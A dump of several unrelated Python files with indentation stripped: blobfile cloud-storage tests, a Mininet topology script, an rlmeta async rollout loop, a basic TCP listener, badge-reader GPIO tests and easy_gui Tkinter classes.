read_contents += f.read()
assert len(f.read()) == 0
assert (
read_contents
== long_contents[:chunk_size] + short_contents[chunk_size:]
)
# make file longer
with bf.BlobFile(path, "wb") as f:
f.write(short_contents)
with bf.BlobFile(path, "rb") as f:
read_contents = f.read(chunk_size)
with bf.BlobFile(path, "wb") as f2:
f2.write(long_contents)
# close underlying connection
f.raw._f = None # type: ignore
read_contents += f.read()
assert len(f.read()) == 0
expected = (
short_contents[:chunk_size] + long_contents[chunk_size : chunk_size * 2]
)
# local files behave differently and read the new contents until the
# end of the new file size
if not path.startswith("gs://") and not path.startswith("https://"):
expected = short_contents[:chunk_size] + long_contents[chunk_size:]
assert read_contents == expected
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_overwrite_while_reading(ctx):
chunk_size = 8 * 2 ** 20
contents = b"\x00" * chunk_size * 2
alternative_contents = b"\xFF" * chunk_size * 4
with ctx() as path:
with bf.BlobFile(path, "wb") as f:
f.write(contents)
with bf.BlobFile(path, "rb") as f:
read_contents = f.read(chunk_size)
with bf.BlobFile(path, "wb") as f2:
f2.write(alternative_contents)
# close underlying connection
f.raw._f = None # type: ignore
read_contents += f.read(chunk_size)
assert (
read_contents
== contents[:chunk_size]
+ alternative_contents[chunk_size : chunk_size * 2]
)
def test_create_local_intermediate_dirs():
contents = b"meow"
with _get_temp_local_path() as path:
dirpath = bf.dirname(path)
with chdir(dirpath):
for filepath in [
bf.join(dirpath, "dirname", "file.name"),
bf.join("..", bf.basename(dirpath), "file.name"),
"./file.name",
"file.name",
]:
with bf.BlobFile(filepath, "wb") as f:
f.write(contents)
@pytest.mark.parametrize("binary", [True, False])
@pytest.mark.parametrize("streaming", [True, False])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_more_read_write(binary, streaming, ctx):
rng = np.random.RandomState(0)
with ctx() as path:
if binary:
read_mode = "rb"
write_mode = "wb"
else:
read_mode = "r"
write_mode = "w"
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
pass
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert len(r.read()) == 0
contents = b"meow!"
if not binary:
contents = contents.decode("utf8")
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
w.write(contents)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert r.read(1) == contents[:1]
assert r.read() == contents[1:]
assert len(r.read()) == 0
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
for i in range(len(contents)):
assert r.read(1) == contents[i : i + 1]
assert len(r.read()) == 0
assert len(r.read()) == 0
contents = b"meow!\n\nmew!\n"
lines = [b"meow!\n", b"\n", b"mew!\n"]
if not binary:
contents = contents.decode("utf8")
lines = [line.decode("utf8") for line in lines]
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
w.write(contents)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert r.readlines() == lines
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert [line for line in r] == lines
if binary:
for size in [2 * 2 ** 20, 12_345_678]:
contents = rng.randint(0, 256, size=size, dtype=np.uint8).tobytes()
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
w.write(contents)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
size = rng.randint(0, 1_000_000)
buf = b""
while True:
b = r.read(size)
if b == b"":
break
buf += b
assert buf == contents
else:
obj = {"a": 1}
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
json.dump(obj, w)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert json.load(r) == obj
@pytest.mark.parametrize("streaming", [True, False])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_video(streaming, ctx):
rng = np.random.RandomState(0)
shape = (256, 64, 64, 3)
video_data = rng.randint(0, 256, size=np.prod(shape), dtype=np.uint8).reshape(shape)
with ctx() as path:
with bf.BlobFile(path, mode="wb", streaming=streaming) as wf:
with imageio.get_writer(
wf,
format="ffmpeg",
quality=None,
codec="libx264rgb",
pixelformat="bgr24",
output_params=["-f", "mp4", "-crf", "0"],
) as w:
for frame in video_data:
w.append_data(frame)
with bf.BlobFile(path, mode="rb", streaming=streaming) as rf:
with imageio.get_reader(
rf, format="ffmpeg", input_params=["-f", "mp4"]
) as r:
for idx, frame in enumerate(r):
assert np.array_equal(frame, video_data[idx])
with bf.BlobFile(path, mode="rb", streaming=streaming) as rf:
container = av.open(rf)
stream = container.streams.video[0]
for idx, frame in enumerate(container.decode(stream)):
assert np.array_equal(frame.to_image(), video_data[idx])
# this is pretty slow and docker will often run out of memory
@pytest.mark.slow
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_large_file(ctx):
contents = b"0" * 2 ** 32
with ctx() as path:
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(contents)
with bf.BlobFile(path, "rb", streaming=True) as f:
assert contents == f.read()
def test_composite_objects():
with _get_temp_gcs_path() as remote_path:
with _get_temp_local_path() as local_path:
contents = b"0" * 2 * 2 ** 20
with open(local_path, "wb") as f:
f.write(contents)
def create_composite_file():
sp.run(
[
"gsutil",
"-o",
"GSUtil:parallel_composite_upload_threshold=1M",
"cp",
local_path,
remote_path,
],
check=True,
)
local_md5 = hashlib.md5(contents).hexdigest()
create_composite_file()
assert bf.stat(remote_path).md5 is None
assert local_md5 == bf.md5(remote_path)
assert bf.stat(remote_path).md5 == local_md5
assert local_md5 == bf.md5(remote_path)
bf.remove(remote_path)
create_composite_file()
assert bf.stat(remote_path).md5 is None
with tempfile.TemporaryDirectory() as tmpdir:
with bf.BlobFile(
remote_path, "rb", cache_dir=tmpdir, streaming=False
) as f:
assert f.read() == contents
assert bf.stat(remote_path).md5 == local_md5
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_md5(ctx):
contents = b"meow!"
meow_hash = hashlib.md5(contents).hexdigest()
with ctx() as path:
_write_contents(path, contents)
assert bf.md5(path) == meow_hash
with bf.BlobFile(path, "wb") as f:
f.write(contents)
assert bf.md5(path) == meow_hash
with bf.BlobFile(path, "wb") as f:
f.write(contents)
assert bf.md5(path) == meow_hash
@pytest.mark.parametrize("ctx", [_get_temp_as_path])
def test_azure_maybe_update_md5(ctx):
contents = b"meow!"
meow_hash = hashlib.md5(contents).hexdigest()
alternative_contents = b"purr"
purr_hash = hashlib.md5(alternative_contents).hexdigest()
with ctx() as path:
_write_contents(path, contents)
st = azure.maybe_stat(ops.default_context._conf, path)
assert azure.maybe_update_md5(
ops.default_context._conf, path, st.version, meow_hash
)
_write_contents(path, alternative_contents)
assert not azure.maybe_update_md5(
ops.default_context._conf, path, st.version, meow_hash
)
st = azure.maybe_stat(ops.default_context._conf, path)
assert st.md5 == purr_hash
bf.remove(path)
assert not azure.maybe_update_md5(
ops.default_context._conf, path, st.version, meow_hash
)
def _get_http_pool_id(q):
q.put(id(ops.default_context._conf.get_http_pool()))
def test_fork():
q = mp.Queue()
# this reference should keep the old http client alive in the child process
# to ensure that a new one does not recycle the memory address
http1 = ops.default_context._conf.get_http_pool()
parent1 = id(http1)
p = mp.Process(target=_get_http_pool_id, args=(q,))
p.start()
p.join()
http2 = ops.default_context._conf.get_http_pool()
parent2 = id(http2)
child = q.get()
assert parent1 == parent2
assert child != parent1
def test_azure_public_container():
for error, path in [
(
None,
f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/publiccontainer/test_cat.png",
),
(
bf.Error,
f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/private/test_cat.png",
), # an account that exists but with a non-public container
(
FileNotFoundError,
f"https://{AS_INVALID_ACCOUNT}.blob.core.windows.net/publiccontainer/test_cat.png",
), # account that does not exist
]:
ctx = contextlib.nullcontext()
if error is not None:
ctx = pytest.raises(error)
with ctx:
with bf.BlobFile(path, "rb") as f:
contents = f.read()
assert contents.startswith(AZURE_PUBLIC_URL_HEADER)
def test_scandir_error():
for error, path in [
(None, AZURE_VALID_CONTAINER),
(FileNotFoundError, AZURE_INVALID_CONTAINER),
(FileNotFoundError, AZURE_INVALID_CONTAINER_NO_ACCOUNT),
(bf.Error, f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/private"),
]:
ctx = contextlib.nullcontext()
if error is not None:
ctx = pytest.raises(error)
with ctx:
print(path)
list(bf.scandir(path))
def test_windowed_file():
with _get_temp_local_path() as path:
with open(path, "wb") as f:
f.write(b"meow")
with open(path, "rb") as f:
f2 = common.WindowedFile(f, start=1, end=3)
assert f2.read() == b"eo"
f2.seek(0)
assert f2.read(1) + f2.read(1) + f2.read(1) == b"eo"
with pytest.raises(AssertionError):
f2.seek(-1)
with pytest.raises(AssertionError):
f2.seek(2)
def test_pickle_config():
ctx = ops.create_context()
c = ctx._conf
pickle.dumps(c)
c.get_http_pool()
c2 = pickle.loads(pickle.dumps(c))
c2.get_http_pool()
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_read_with_size(ctx):
contents = b"meow!\npurr\n"
with ctx() as path:
path = bf.join(path, "a folder", "a.file")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as w:
w.write(contents)
with bf.BlobFile(path, "rb", file_size=1) as r:
assert r.read() == contents[:1]
assert r.tell() == 1
|
new1.py
|
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.util import dumpNodeConnections
from mininet.log import setLogLevel
from mininet.cli import CLI
import threading, time, socket, logging, SocketServer, sys
#tree4 = TreeTopo(depth=2, fanout=2)
##net = Mininet(topo=tree4)
#net.start()
#h1, h4 = net.hosts[0], net.hosts[3]
#print(h1.cmd('ping -c1 %s' % h4.IP()))
#net.stop()
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class SingleSwitchTopo(Topo):
def build(self, n=2):
self.addSwitch('s1')
self.addSwitch('s2')
self.addSwitch('s3')
self.addLink('s1','s2')
self.addLink('s1','s3')
self.addSwitch('s4')
self.addSwitch('s5')
self.addSwitch('s6')
self.addSwitch('s7')
self.addLink('s2','s4')
self.addLink('s2','s5')
self.addLink('s3','s6')
self.addLink('s3','s7')
self.addHost('h1')
self.addHost('h2')
self.addHost('h3')
self.addHost('h4')
self.addHost('h5')
self.addHost('h6')
self.addHost('h7')
self.addHost('h8')
self.addLink('s4', 'h1')
self.addLink('s4', 'h2')
self.addLink('s5', 'h3')
self.addLink('s5', 'h4')
self.addLink('s6', 'h5')
self.addLink('s6', 'h6')
self.addLink('s7', 'h7')
self.addLink('s7', 'h8')
#switch = self.addSwitch('s')
#for h in range(n):
# host = self.addHost('h%s' % (h+1))
# self.addLink(host, switch)
# print('added link')
def simpleTest():
topo1 = SingleSwitchTopo(n=2)
net = Mininet(topo1)
net.start()
print("Dumping")
dumpNodeConnections(net.hosts)
print("Testing")
net.pingAll()
global h1
global h2
print('get h1')
h1 = net.get('h1')
print('get h2')
h2 = net.get('h2')
thread1 = threading.Thread(target=startH1)
thread2 = threading.Thread(target=startH2)
thread1.start()
thread2.start()
#print h1.cmd('python myServer.py', h1.IP())
#print h2.cmd('python myClient.py', h1.IP())
#p1 = h1.popen('python myServer.py &')
CLI(net)
#p1.terminate()
net.stop()
def startH1():
print("doing startH1")
h1.cmd('python myServer.py')
def startH2():
h2.cmd('python myClient.py')
if __name__ == '__main__':
#setLogLevel('info')
simpleTest()
# address = ('localhost', 0) # let the kernel give us a port
# server = EchoServer(address, EchoRequestHandler)
# ip, port = server.server_address # find out what port we were given
# t = threading.Thread(target=server.serve_forever)
# t.setDaemon(True) # don't hang on exit
# t.start()
# logger = logging.getLogger('client')
# logger.info('Server on %s:%s', ip, port)
# Connect to the server
# logger.debug('creating socket')
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# logger.debug('connecting to server')
# s.connect((ip, port))
# Send the data
# message = 'Hello, world'
# logger.debug('sending data: "%s"', message)
# len_sent = s.send(message)
# Receive a response
# logger.debug('waiting for response')
# response = s.recv(len_sent)
# logger.debug('response from server: "%s"', response)
# Clean up
# logger.debug('closing socket')
# s.close()
# logger.debug('done')
# server.socket.close()
|
loop.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import abc
import asyncio
import logging
import time
from typing import Dict, List, NoReturn, Optional, Sequence, Union
import torch
import torch.multiprocessing as mp
import moolib
import rlmeta.core.remote as remote
import rlmeta.utils.asycio_utils as asycio_utils
import rlmeta.utils.moolib_utils as moolib_utils
from rlmeta.agents.agent import Agent, AgentFactory
from rlmeta.core.controller import Controller, ControllerLike, Phase
from rlmeta.core.launchable import Launchable
from rlmeta.envs.env import Env, EnvFactory
class Loop(abc.ABC):
@abc.abstractmethod
def run(self, num_episodes: Optional[int] = None) -> None:
"""
"""
class AsyncLoop(Loop, Launchable):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: ControllerLike,
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._envs = []
self._agents = []
self._controller = controller
self._loop = None
self._tasks = []
self._running = False
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
@property
def running(self) -> bool:
return self._running
@running.setter
def running(self, running: bool) -> None:
self._running = running
def init_launching(self) -> None:
pass
def init_execution(self) -> None:
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, remote.Remote):
obj.name = moolib_utils.expend_name_by_index(
obj.name, self.index)
obj.connect()
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, Launchable):
obj.init_execution()
for i in range(self._num_rollouts):
env = self._env_factory(self.index_offset + i)
if self.seed is not None:
env.seed(self.seed + self.index_offset + i)
self._envs.append(env)
for i in range(self._num_rollouts):
agent = self._agent_factory(self.index_offset + i)
agent.connect()
# if self.seed is not None:
# agent.seed(self.seed + self.index_offset + i)
self._agents.append(agent)
def run(self) -> NoReturn:
self._loop = asyncio.get_event_loop()
self._tasks.append(
asycio_utils.create_task(self._loop, self._check_phase()))
for i, (env, agent) in enumerate(zip(self._envs, self._agents)):
task = asycio_utils.create_task(
self._loop, self._run_loop(env, agent, self.index_offset + i))
self._tasks.append(task)
try:
self._loop.run_forever()
except Exception as e:
logging.error(e)
raise e
finally:
for task in self._tasks:
task.cancel()
self._loop.stop()
async def _check_phase(self) -> NoReturn:
while True:
cur_phase = await self._controller.async_get_phase()
self._running = (cur_phase == self.running_phase)
await asyncio.sleep(1)
async def _run_loop(self,
env: Env,
agent: Agent,
index: int = 0) -> NoReturn:
while True:
while not self.running:
await asyncio.sleep(1)
stats = await self._run_episode(env, agent, index)
if stats is not None:
await self._controller.async_add_episode(stats)
# Similar loop as DeepMind's Acme
# https://github.com/deepmind/acme/blob/master/acme/environment_loop.py#L68
async def _run_episode(self,
env: Env,
agent: Agent,
index: int = 0) -> Optional[Dict[str, float]]:
episode_length = 0
episode_return = 0.0
start_time = time.perf_counter()
timestep = env.reset()
await agent.async_observe_init(timestep)
while not timestep.done:
if not self.running:
return None
action = await agent.async_act(timestep)
timestep = env.step(action)
await agent.async_observe(action, timestep)
if self.should_update:
await agent.async_update()
episode_length += 1
episode_return += timestep.reward
episode_time = time.perf_counter() - start_time
steps_per_second = episode_length / episode_time
return {
"episode_length": float(episode_length),
"episode_return": episode_return,
"episode_time/s": episode_time,
"steps_per_second": steps_per_second,
}
class ParallelLoop(Loop):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: Union[Controller, remote.Remote],
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
num_workers: Optional[int] = None,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
self._num_workers = min(mp.cpu_count(), self._num_rollouts)
if num_workers is not None:
self._num_workers = min(self._num_workers, num_workers)
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._controller = controller
self._workloads = self._compute_workloads()
self._async_loops = []
self._processes = []
index_offset = self._index_offset
for i, workload in enumerate(self._workloads):
loop = AsyncLoop(self._env_factory, self._agent_factory,
self._controller, self.running_phase,
self.should_update, workload, i, index_offset,
self.seed)
self._async_loops.append(loop)
index_offset += workload
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def num_workers(self) -> int:
return self._num_workers
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
def run(self) -> NoReturn:
processes = []
for loop in self._async_loops:
loop.init_launching()
process = mp.Process(target=self._run_async_loop, args=(loop,))
processes.append(process)
for process in processes:
process.start()
self._processes = processes
def start(self) -> None:
self.run()
def join(self) -> None:
for process in self._processes:
process.join()
def terminate(self) -> None:
for process in self._processes:
process.terminate()
def _compute_workloads(self) -> List[int]:
workload = self.num_rollouts // self.num_workers
r = self.num_rollouts % self.num_workers
workloads = [workload + 1] * r + [workload] * (self.num_workers - r)
return workloads
def _run_async_loop(self, loop: AsyncLoop) -> NoReturn:
if loop.seed is not None:
torch.manual_seed(loop.seed + loop.index_offset)
loop.init_execution()
loop.run()
class LoopList:
def __init__(self, loops: Optional[Sequence[Loop]] = None) -> None:
self._loops = []
if loops is not None:
self._loops.extend(loops)
@property
def loops(self) -> List[Loop]:
return self._loops
def append(self, loop: Loop) -> None:
self.loops.append(loop)
def extend(self, loops: Union[LoopList, Sequence[Loop]]) -> None:
if isinstance(loops, LoopList):
self.loops.extend(loops.loops)
else:
self.loops.extend(loops)
def start(self) -> None:
for loop in self.loops:
loop.start()
def join(self) -> None:
for loop in self.loops:
loop.join()
def terminate(self) -> None:
for loop in self.loops:
loop.terminate()
LoopLike = Union[Loop, LoopList]
|
simple_tcp_server.py
|
#!/usr/bin/env python
import socket
import threading
# this is our client-handling thread
def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
# send back a packet
client_socket.send("ACK!")
client_socket.close()
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
while True:
client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
test_badgereader_wiegand_gpio.py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for authbox.badgereader_wiegand_gpio"""
import threading
import time
import unittest
import authbox.badgereader_wiegand_gpio
from authbox import fake_gpio_for_testing
from authbox.compat import queue
from RPi import GPIO
class BadgereaderWiegandGPIOTest(unittest.TestCase):
def setUp(self):
self.fake = fake_gpio_for_testing.FakeGPIO()
self.q = queue.Queue()
self.b = authbox.badgereader_wiegand_gpio.WiegandGPIOReader(
self.q, "b", "0", "1", on_scan=self.on_scan,
)
def on_scan(self, badge_number):
pass
def test_simple_scan(self):
self.fake.press(1, GPIO.FALLING)
self.fake.press(0, GPIO.FALLING)
self.b.run_inner()
self.assertEqual(self.q.get(block=False), (self.on_scan, "10"))
def test_blocks_until_scan(self):
def add_bits_later():
time.sleep(0.2)
self.fake.press(1, GPIO.FALLING)
self.fake.press(0, GPIO.FALLING)
t = threading.Thread(target=add_bits_later)
t.start()
self.b.run_inner()
self.assertEqual(self.q.get(block=False), (self.on_scan, "10"))
def test_limited_queue_size(self):
for i in range(500):
self.fake.press(0, GPIO.FALLING)
self.b.run_inner()
self.assertEqual(self.q.get(block=False), (self.on_scan, "0" * 100))
# Make sure that state is reset.
self.assertTrue(self.b.bitqueue.empty())
|
master_classes.py
|
'''
Python module containing "Master" classes of easy_gui project.
The classes in here are designed to be subclassed in user applications.
'''
import tkinter as tk
import tkinter.scrolledtext
from tkinter import ttk
from tkinter import _tkinter
from .styles import BaseStyle
from . import widgets
import os
import sys
import threading
import traceback
from typing import List, Dict
def recreate_if_needed(func):
'''
Decorator used to enable addition of Sections or Widgets after GUI has been created.
(that is, can add elements outside of EasyGUI subclass' __init__ method)
'''
def inner(*args, **kwargs):
self = args[0]
value = func(*args, **kwargs)
if self.root.created:
self.root.create() # need to re-create GUI so that the new elements show up!
return value
return inner
class GridMaster():
def __init__(self):
self.grid_areas = {}
self.grid_configuration = []
def configure_grid(self, grid_configuration: List[str]) -> Dict[str, int]:
'''
Specify full-window layout with CSS grid-template-area style list of strings.
- Each item in provided grid_configuration corresponds to a grid row and spaces
delimit each cell.
- Individual cells or rectangular groups of contiguous cells may be indicated by name
while unnamed cells are specified by one or more periods.
'''
self.grid_configuration = grid_configuration
self.grid_rows = len(grid_configuration)
self.grid_columns = len(grid_configuration[0].split())
for row in grid_configuration:
if len(grid_configuration[0].split()) != self.grid_columns:
print('ERROR! Differing number of grid columns specified below:')
print(grid_configuration)
return
names = set(cell for row in grid_configuration for cell in row.split() if '.' not in cell)
for name in names:
first_row, last_row, first_column, last_column = None, None, None, None
for i, row in enumerate(grid_configuration):
if name in row.split():
if first_row is None:
first_row = i # will stay fixed at the first row containing name
last_row = i # will continue to increase for multiple rows
if first_column is None:
row_list = row.split()
first_column = row_list.index(name) # get far left column of name
last_column = len(row_list) - row_list[::-1].index(name) - 1 # reverse to get far right column
self.grid_areas[name] = {'first_row': first_row, 'last_row': last_row,
'first_column': first_column, 'last_column': last_column}
# Now make elements expand evenly with window resize by default
if self.grid_areas != {}:
limits = self.grid_limits()
for row in range(limits['min_row'], limits['max_row'] + 1):
self.grid_rowconfigure(row, weight=1, minsize=10)
for col in range(limits['min_col'], limits['max_col'] + 1):
self.grid_columnconfigure(col, weight=1, minsize=10)
def add_grid_row(self, row_name: str):
if self.grid_configuration == []:
self.grid_configuration = [row_name]
else:
num_columns = len(self.grid_configuration[0].split(' '))
self.grid_configuration.append(' '.join([row_name] * num_columns))
self.configure_grid(self.grid_configuration)
def grid_limits(self) -> dict:
min_row, max_row, min_col, max_col = 500, -500, 500, -500 # arbitrarily large starting points so no risk of surprising row/col not being captured
for area in self.grid_areas.values():
if area['first_row'] < min_row:
min_row = area['first_row']
if area['last_row'] > max_row:
max_row = area['last_row']
if area['first_column'] < min_col:
min_col = area['first_column']
if area['last_column'] > max_col:
max_col = area['last_column']
return {'min_row': min_row, 'max_row': max_row, 'min_col': min_col, 'max_col': max_col}
class SectionMaster():
def __init__(self):
self.sections: dict = {}
self.widgets: dict = {}
@recreate_if_needed
def add_section(self, name='', title=False, grid_area=None,
borderwidth=None, relief=None, tabbed: bool=False, equal_button_width: bool=False, external_section=None):
'''
Add a Section object to the parent (root window or other Section).
'''
if external_section: # if is an externally-built section is passed in
if not name:
name = external_section.__name__
section = external_section(parent=self, name=name, title=title, grid_area=grid_area,
borderwidth=borderwidth, relief=relief, tabbed=tabbed, equal_button_width=equal_button_width)
else:
if name == '':
name = f'section{len(self.sections) + 1}'
if name in self.sections:
raise ValueError('Unable to add section as a section with the given name already exists!')
if borderwidth is None:
borderwidth = self.style.borderwidth
if relief is None:
relief = self.style.section_border
# Next 2 lines set grid_area to be name if not explicitly declared and not already used as a grid_area
if grid_area is None and name not in [s.grid_area for s in self.sections.values()]:
grid_area = name
section = Section(parent=self, name=name, title=title, grid_area=grid_area,
borderwidth=borderwidth, relief=relief, tabbed=tabbed, equal_button_width=equal_button_width)
self.sections[name] = section
return section
@recreate_if_needed
def add_widget(self, type='label', text='', widget_name=None, grid_area=None, **kwargs):
'''
Add a Widget object to this Section by calling the add_widget function in widgets.py
(Easier to keep the function there as it needs access to all the individual Widget classes.)
'''
return widgets.add_widget(self, type=type, text=text, widget_name=widget_name, grid_area=grid_area, **kwargs)
def delete_widget(self, widget_name) -> None:
'''
Fully delete a widget.
Pass without issue if the widget doesn't exist.
'''
try:
self.widgets[widget_name].destroy()
del self.widgets[widget_name]
except:
pass
def delete_all_widgets(self) -> None:
'''
Fully delete all child widgets of this section.
'''
for w_name in list(self.widgets.keys()):
self.delete_widget(w_name)
def _clear_and_recreate_plot(self, mpl_figure, widget_name, grid_area, kwargs):
old_widget = self.widgets[widget_name] # grab reference to widget to be deleted so that its place in dict can be given to new widget
new_widget = self.add_widget(type='matplotlib', widget_name=widget_name, toolbar=old_widget.toolbar, grid_area=grid_area)
new_widget.bindings = old_widget.bindings
new_widget.small_figure_warning_given = old_widget.small_figure_warning_given
new_widget.position()
new_widget.draw_plot(mpl_figure=mpl_figure)
new_widget.position() # have to reposition/create Widget
old_widget.destroy() # destroy after new widget is positioned for slightly less flickering
@recreate_if_needed
def add_tab(self, name='', **kwargs):
if not self.tabbed:
print('Error! Cannot .add_tab to a Section unless tabbed=True when it is created.')
return
section = Section(parent=self.tabs, name=name, **kwargs)
self.sections[name] = section
self.tabs.add(section, text=name)
return section
def delete_section(self, section_name) -> None:
'''
Fully delete a section and all of its child widgets.
Pass without issue if the section doesn't exist.
'''
try:
for key, widget in self.sections[section_name].widgets.items():
widget._widget.destroy()
self.sections[section_name].destroy()
del self.sections[section_name]
except:
pass
class EasyGUI(tk.Tk, GridMaster, SectionMaster):
'''
Main class to be subclassed for full GUI window.
'''
style = BaseStyle()
def __init__(self, alpha: float=1.0, topmost: bool=False, disable_interaction: bool=False, toolwindow: bool=False, fullscreen: bool=False, overrideredirect: bool=False, **kwargs) -> None:
super().__init__()
GridMaster.__init__(self)
SectionMaster.__init__(self)
EasyGUI.style.create_font() # have to generate font.Font object after initial tk root window is created
self.key_log = [] # record keys/buttons triggered
self.key_triggers = [('closegui', lambda: self.close())]
self.icon(bitmap=os.path.join(os.path.dirname(__file__), 'resources', 'transparent.ico'), default=True)
self.title('EasyGUI')
self.geometry("300x180+100+60") # format of "WIDTHxHEIGHT+(-)XPOSITION+(-)YPOSITION"
self.transparent = False
self.configure(background=self.style.window_color)
if self.style.transparent:
self.wm_attributes('-transparentcolor', 'white') # turn off window shadow
# See documention of below WINDOWS options here: https://wiki.tcl-lang.org/page/wm+attributes
self.wm_attributes('-alpha', alpha)
self.wm_attributes('-fullscreen', fullscreen)
self.wm_attributes('-disabled', disable_interaction) # disables window interaction for click pass through
self.wm_attributes('-toolwindow', toolwindow) # makes a window with a single close-button (which is smaller than usual) on the right of the title bar
self.wm_attributes('-topmost', topmost) # make root window always on top
self.overrideredirect(overrideredirect) # hide root window drag bar and close button
s = ttk.Style()
s.configure('.', background=self.style.widget_bg_color)
s.configure('.', font=self.style.font)
s.configure('.', foreground=self.style.text_color)
self.created = False
def __init_subclass__(cls, **kwargs):
'''
Wraps user subclass __init__ to implicitly handle the EasyGUI.__init__ call along with
calling .create() after application is fully defined in subclass __init__ method
'''
old_init = cls.__init__ # reference to original subclass method so new_init isn't recursive
def new_init(self, *args, **kwargs):
EasyGUI.__init__(self, **kwargs) # in place of super().__init__() in subclass __init__
try:
old_init(self, *args, **kwargs)
except TypeError:
print('\n* Are you passing in kwargs to GUI creation?\n* If so, remember to put a "**kwargs" in the __init__ function!\n')
traceback.print_exc()
self.create() # populates GUI elements
self.bind_all('<Key>', self.log_keys)
self.mainloop() # runs tkinter mainloop
cls.__init__ = new_init # overwrite subclass __init__ method
@property
def root(self):
'''Used by downstream elements to reference EasyGUI as root'''
return self
def log_keys(self, event):
'''
Record key presses up to a maximum of 100 characters.
Also check to see if any triggers are met and execute as needed.
'''
self.key_log.append(event.char)
self.key_log = self.key_log[-100:]
self.check_key_triggers()
def check_key_triggers(self):
'''
Check if a key trigger has been met,
run function if so, and clear out key log.
(so next key doesn't trigger same result)
'''
key_str = ''.join(self.key_log)
for trigger, action in self.key_triggers:
if trigger in key_str:
self.key_log = []
action()
break
def add_key_trigger(self, trigger, func, separate_thread: bool=False):
'''
Bind a function to a sequence of key presses.
Can specify as separate_thread=True for long-running functions.
'''
if separate_thread:
def threaded_func(*args):
threading.Thread(target=func).start()
self.key_triggers.append((trigger, threaded_func))
else:
self.key_triggers.append((trigger, func))
def close(self):
'''
Alias for self.destroy.
Can be used by any GUI element to close the window via "self.root.close()"
since self.root will travel upstream until it hits EasyGUI.close().
'''
self.destroy()
def icon(self, bitmap, default: bool=False) -> None:
'''
Alternate method to call tk.Tk iconbitmap method using altered path handling
so that PyInstaller can package application with specified .ico file.
If not default, warning message is printed on failing to locate .ico file.
'''
try:
super().iconbitmap(bitmap=resource_path(bitmap))
except _tkinter.TclError:
if default:
pass # Pass silently if default .ico not found occurs when using PyInstaller and not adding transparent.ico to "datas"
else:
